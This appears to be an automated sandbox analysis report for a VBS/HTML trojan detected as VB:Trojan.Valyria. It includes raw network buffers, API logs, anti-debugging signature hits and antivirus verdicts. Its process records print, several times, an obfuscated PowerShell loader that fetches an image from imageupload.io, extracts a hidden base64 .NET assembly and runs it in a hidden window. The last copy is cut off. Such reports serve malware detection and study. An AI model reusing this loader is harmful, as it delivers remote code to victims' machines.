Ü£%ǁÕäŸmM@IÂ{`ž°©JÇ5¸¦(*‚ÍÄfíkÔÕÍg•5ñÝ»6$ê\E IJ‹;>uց#§Ý|ƒkY³Ó¾mµ’©ZíáɃ­Ça/H§#Ó\¸aӟÒ#ƒ–¸úÌÿãËÀ9À|MUaÁ­‚} cxhÒ½0dù©à,Ãä Zf)sn#Lˆy£çáRæLr*
Data received U¼{ ,NÂñ+f¦Ê;-mŒ¦šÞƒu҂ ÒL+"NÓòn[,7NÖÑÿ‡R&`˜Ž,Õ{¸+ò9cز [óMI@’òr\8=ÈÄ|$VIƒT÷Ss@Cz_Eµgñ©UβêOCg(rÐÛ±šr8#±¦–éÐS=+U´ò žÆ]ÅÜ+-qåRŸÙþ¸ñºÈp¦\&ÓfjS¤*ÚÈÃwïî}x(À’€¥pg'ª9[éÃTàbkE4ü…ÃZ^â¯;صrK>ñnÿ“ž~©Ï|F£·ÑTŽýYߝ©ä¥æ!'ÓLžµ–SŠó¹VKó‰µ SZÙ fVÅJ¶t£^ÀøÞCÊf·BM–®ÜsÆÄ’e§%ˆ0…(+ÏÐd7»Â¹¥”åÀž$iÊÁÌwrv¯#jÅʹƒ´?PR¤r.N¯Ž£ªBÃ9>Gst—œÎGx`¸ÊϟÔ^2lÛLÍÌ­A§l…–ž¯ÎeÀ›¥p®v÷ûØì»OL¨VÁq˜ÕWwíKš„{hkÏc½­°Öb±Û±–0ëQf3g±)ã‹ûl¾@È+4ñpI`ý÷GŒÝ$#¸+ÒüÎá[ÿ` %31:2ÒÀ¶V0°R’áå¸*Sþh÷µÛð`Ö¬ë„ݸ×ÓÖãò0¿–ï–‹˜GƒÈÚ; Ìõ›Œ<j::]Òkëi_7‰ªiË øNëÊ@‚œp8ï‹V¿wµVåγ²´o ñ)!BˆpûFÓ+±?¶>w&ó¼œxöž¤Ò?X” •-þËÇ« ;d8}§2xQ×Ôûѧ^|’?zÊ]Q7žûø©\-ôÖ–)jßÍ7zýÖÔStB¿^œn‰#aIvªOì 7(b©P‰\mƒ:ʼnŸŠeË7da·?¹[ê»ÖoÌëôEíˆw¹vTèn%–…áÀä˜x)øÒbîånœ+‘Žÿ%VüÃßCç.r”‰­ùËÞ8SnþÞW*>ülFñ#ºƒµ‹QqCÍðYŠË1ÙèŽÙÌ *ۍEù3ª.:õ´G<ãO £»jÜêlÏýÒÿUõŠÌWõ¸F‹ÄðÞ´8U B´Ø.ãaᘕ¨ù.rXø¶֒SnÓ@%ÕL$%±¹0c•qFÒ:Z'ëT$!æV©g!ôé2½X Ö ÇݲÂk6ócû0ѹŸH‚™Í¶ãÅK®xUKhã³&}Aí¢<H_L×"f#„7»J‚á»( iš©Ê±;ÆåÅ¡ ûਧ¶÷쎊û£ºÁœüËLÔR Àz¥óAVì&Y%:,ùàK£f]ÃožŽ¶ã4,¾ $ç¦0Ù,lRç÷ ã²»^bücªêo+øfR®¯1LJ…_*,7Ë)ª ¶ù‡81Y ÓéU_ʘ$VwãiÚßn£Kœ’¢5ð'bÇè3Ójûif‚ i­íÓ´Ìó>.^``ŽdVU«ŒÕ•€¨®lOû‹9ž±ºžIœ½{ Ï Æ€žöJî£äøY^¢ Dkô~ü­xmp'JíZI5õÁp² ˜ L&æ „,üî :éÎÝÆ[#ožúønÛ&±îï2®0|tZÞ ÊMSԛ…4r&Š×Ã_2Tµs57–ŒMØ¡íϦW"SÖ±€iº×fQŒ”­†m¹–$áVêl€ßLAô<ù;âpK[‚f PF£ç8ÈÚCg6«°„Ù S5¯PtŒÒžb¤—Ž:ƒÔŠ2,2kfç®3âhÏÿ‘ Á­»p(–µq[Êp`
Data received € ¬NMŎ¯•p•S¡18]rdzTZ?3|4õ@,qÐýór¢OcÜ\®H6LqÞ`g¸"ôi=ᤶÃ؎ñ:+qƒIA²»â(ñuèíyƒQüԙ>Úü8v¿‚O|•+"¼±äýŠøääÎ oƒ?B¤ÿÚ(Rþœå¾òž4íKøªMiÆ*Eypޕ—. H¥­%ž›ºðAû÷0ªƒTԊÓVÞ[öšnÄ'-A£F#ìÄyT.¾ã+h’D‘=uQŠÔñ¤}»ììíuïN®¨ÙøØD_²%”¢°]ÅÎ^ɦŒ%Wch£Iw輊_;Àèšÿ[& lŸöë A{šÎþF“2;•­ ú ’º¶Škg¿÷ ڊ¥Ø†‹R”iº YnÐoA®üÝÀ¹¥®Èc_PL•]ÆéM&‹K>jËya·½—GܯK½ºj¶¥½wwõvM=5ÎýáLûóhûL#¥– ñäÏB¦ýćñ$ kØøW’í½…½yøz™ú¯IY©!¸+*{üGZúÝõߏ.îњYy]ÿfc7¯ãHm)Îï]¶, ÀyPð³6ÎD)JÑ ôæRˆ£§L4Á®'ãì/J³ª™È.Ҕx¯k$PgDâ 5ÐrZÓéQgF¨x¿Ü*s–ù< }ÃNªÁWt£ùu*ÒíúÏDIÄFgÑwQ®TòùY,,Š òŒ @Jó“î¢Ásà/ù'*>á†1&÷ÚµM1Ç"¤%Rdñ s`] D^€Tqû”`1¬òwý¨®ŠÎ\÷å" â{g ‚ûÎ}a½åsÝ« ]¡¿¯Å+óÅRÍõ!=t±[„ë[½¡gp— N·Ô¢ÎH_{5VN¸‡%ï—%`…À@*η¹ö<Rxzø÷ÜÝv{Õ{NÜwü;æ܊¿C£“­©uëèzîãü)ûʼÝq'!oÈxÑx2o UŒ¦}HÎmñLdß6¶ûÇ­~9b\¼¶¼îƒôPUá£Ì¿f2ß`§Ò¡æœâØ/ä®9ûp§(þ¿óh2hœº¥Ðľ³Êk·ßtí*å^W;\Òo—üyV« aÍGí^O£ËÓï‘ZŽþ9óââ)ó©'ŽÇ±›–žv”Bí¬Ú¹ò+µ&ŽsÍ –ò!i¬2èí²#ù‚ð÷Ž±ùm“4uòAù¯KnþÚ4¼™|g? ¾ýq’Š¤¥ÊNù¤J^¼†î]ÍSè·~½d â+º|Ôp ‹€jΠ·<<ÝÿQù2ÚOÅ¬îåÅÉ튒¼Q@˜—b’èê”h™¬‚?£1"X™Äj˜›í^Ù.ÛùK§o¾ò—0¬hƒ7õª• _äV‰Ç=_‚ÂX~wõY˜†.§ƒ=ø‰2ۏ+–Ձ¶½RÃP-Ì7ú tŸßcJ5“—õof<L,–ݵb¹aÖ¦‘§±½IJ6ÜíîùD=&]ýš‹ÿÙµ;O£w³õ¥Ójoš· fŽR.g«°†B‹ŒPQgR0šÂÇ5)mV¶ B$VCȏ!Îù•äéoó<ã÷&üõF q¸ ïYM¼kê4ù_ÿ ÆÃYˆ1¯¼rÐ?cïCe¯ô}šâÒ'£V÷Yú~Ìn“@ây6ÿå«s{ƒ4 ¶z•Ò+AÉ _«©”T¿»ü}x1&Bð9Ñ Î%LX—Œ±Ë‚ŒExŒ\39ü< ÆÃâX˜’)ÉÊÅׂé‹PQwÀsf¦4àùM€›O磣|2µš…ÊŽD˜¨}“gèƒ|, ç”!^íU”ÍôUôäóÕ—M
Data received ýì6C²9ke»¡‘©hNóÜߪ¥ÂT(Ì<Aõ@ì,ñ•7s^‘MÚpÞp%Aº )%Ù p?Cãà·òÙöZ퓐ü·“úÅâLE‚7@äÓ<úâZ hXÝÎ6ÿisrˆ?2y<ᔢË"ˆ%ò•$²BPŠQ[«Ï/Ù¹òÓ§{40¯’#HæÍW0”äHV¼]î¥9ž¦ bôSžÍ~.—:é‰8TNÚs˜gÜ_ÛrW;;kùӌƒwÕYO7½HH‰kÈÚÎ ú¼ê¸®:ÄR‚E­Üa žY=èr%mgñ,Àºp"PºTŒ(Ÿq±´$œ|ÒÑßî$’Š,Øót¡žŽúâaú,ú.éK‰ú9V¤8‘Š³ßÍÖ$˜bÛÉÉðÑðg­LšúÒÀ),rÄx®§…±0æèêÔ¹ºõ ø§xº]^q÷WP®W{;½z›SPVêß]kè]f‘p j%œkbk-‚‡?îÕ´î!®!¨ãF+z’­-rû9q-FB3;ƒü½»%dúms Þ·œò1[L0ŒòÍ´.°@-C—Ýô‰¢îÕG±7ooClï¯ÖŒ^‚NªF6ªÛ“³KèR6è9â¤À¹³•èL™{??ñ»ùۑâŸþÌ̑ѱÌ5Õ>v§¯Y§ŒJ`aõÿS®À M*«×¡?Ý k¤Ýàu äV‰A×)¿ Íh1è¹·mâ•ì,£gÖnJÕYñ0=ésŠ`Îû]ѯҐii“®É³ãÝo‡¤rI#b!Ñ,1ý}()ì†ÔV†‰•i…"à¥2Q ©' ª÷ÿ¾4~oh‡½†Ó êâN?MU§•ìš_Ѧ֬ 0,<Så?ïWÜ/¦÷”+Kü °AvDÔ0ßՆµ¨—C|b^¿iÀ´Ó?ã}RMîP&xç¸1(n¹ ¾¿:îŽ Žv‚ªù7ûJ櫋*XÊYp|·º¼, ·0ÙîÑý‚^D|äËNýæ‡$.…ٗ¸ß&8_ÄÍ2Ñ;Nß$ ±Ù}…˜ÜÕáRC_í0:q~tùýMé)ëWáHœ‡ßĺ!,)û1pbl+âÅ)€)üxÍdãÛû~ÒëÀx·ã:‰šÚÕ ¶-&@à i“ƓQ¾ž\J"ËápA*hέ¡ôÈÍ£2æ'9ÿ&/«ôÓ‰ú3•bÎâw* R1Ñ \_#b\e£-=*r)Þ?'9ÙÂâ´"{‚5óxi9Èü`Xòµýbý²æ$$Dá'ƒº=Ô±î@M„—HVI¥²~“lJÅD̃HÓ³{¸˜é<ñÌD$|!@tØ¡\焙6Ÿl]Ð\Ì¥¯_vq_–oÞÀ;¤¯ÐÓ7íË ñ?‹Éj͆jWá‘Z%9_ 6·‘́î`Y»ì-ïíÂi—'S\Eh’<"îVAçI5§îB¤ÄW-/ÕºPԝ'›:tºïígqD/{4i¿#sÎÀ««Œ±P6—j9kD€cºžj–›l˜m%š^ô:³JªhO?™,‘xK¿˜f1˹⍧QBã¦`/´m€á±ž–gvW_ ßC/ëö¼V.Wát*l0pMméÖ+R‚ðsyíü‰ÈWpóº7]KŸî¿FeZyá.ìÉø±-ž©WL!ÊH¦·)‡Gfž<ð½'Âj¨áÆÁ!‘Å!w¨ÌjÐ1uz
Data sent qme@»×œb¢ZŽN¹mÄ{5¥Ì2"ÖBÍà†äœJÄô/5 ÀÀÀ À 28,ÿimageupload.io  
Data sent FBA¨BF{½¹B×t9e O@xaÂHìÞJ’D*?Ý ;±Òw/ːù‡#SïKϪÏD Žoñeöo¥—½03' %lsõP¤µVñz)8¹Ÿªà|ñ2$¸‹ ®Ir´¿¯ö”˘›rô?÷cè
Data sent €¿xœôK ¾oD6A¶?éêý 1ŽÎ˜G:ðÀ+¨¼¡‹E­157€Ë0O—‹ú¾™¥×6¦®Ïã=þf©ÌÐOP-Šè"Jµ´Oño¾½5VówÄ^‰¢¯3M¸sŽvk3káŽB®xÌbg>‡aHˆ)A'¿`O8=Ï
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:904 CREDAT:145409
host 117.18.232.200
MicroWorld-eScan VB:Trojan.Valyria.8400
ALYac VB:Trojan.Valyria.8400
VIPRE VB:Trojan.Valyria.8400
Symantec Scr.Malscript!gen11
Avast Other:Malware-gen [Trj]
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VB:Trojan.Valyria.8400
NANO-Antivirus Trojan.Script.Hworm.dmiour
FireEye VB:Trojan.Valyria.8400
Emsisoft VB:Trojan.Valyria.8400 (B)
GData VB:Trojan.Valyria.8400
Google Detected
MAX malware (ai score=85)
Arcabit VB:Trojan.Valyria.D20D0
Rising Trojan.Agent/VBS!1.EAE0 (CLASSIC)
Ikarus Trojan.VBS.Agent
AVG Other:Malware-gen [Trj]
parent_process iexplore.exe martian_process powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
Time & API Arguments Status Return Repeated

send

buffer: qme@»×œb¢ZŽN¹mÄ{5¥Ì2"ÖBÍà†äœJÄô/5 ÀÀÀ À 28,ÿimageupload.io  
socket: 1280
sent: 118
1 118 0

send

buffer: FBA¨BF{½¹B×t9e O@xaÂHìÞJ’D*?Ý ;±Òw/ːù‡#SïKϪÏD Žoñeöo¥—½03' %lsõP¤µVñz)8¹Ÿªà|ñ2$¸‹ ®Ir´¿¯ö”˘›rô?÷cè
socket: 1280
sent: 134
1 134 0

send

buffer: €¿xœôK ¾oD6A¶?éêý 1ŽÎ˜G:ðÀ+¨¼¡‹E­157€Ë0O—‹ú¾™¥×6¦®Ïã=þf©ÌÐOP-Šè"Jµ´Oño¾½5VówÄ^‰¢¯3M¸sŽvk3káŽB®xÌbg>‡aHˆ)A'¿`O8=Ï
socket: 1280
sent: 133
1 133 0
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process iexplore.exe martian_process powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€C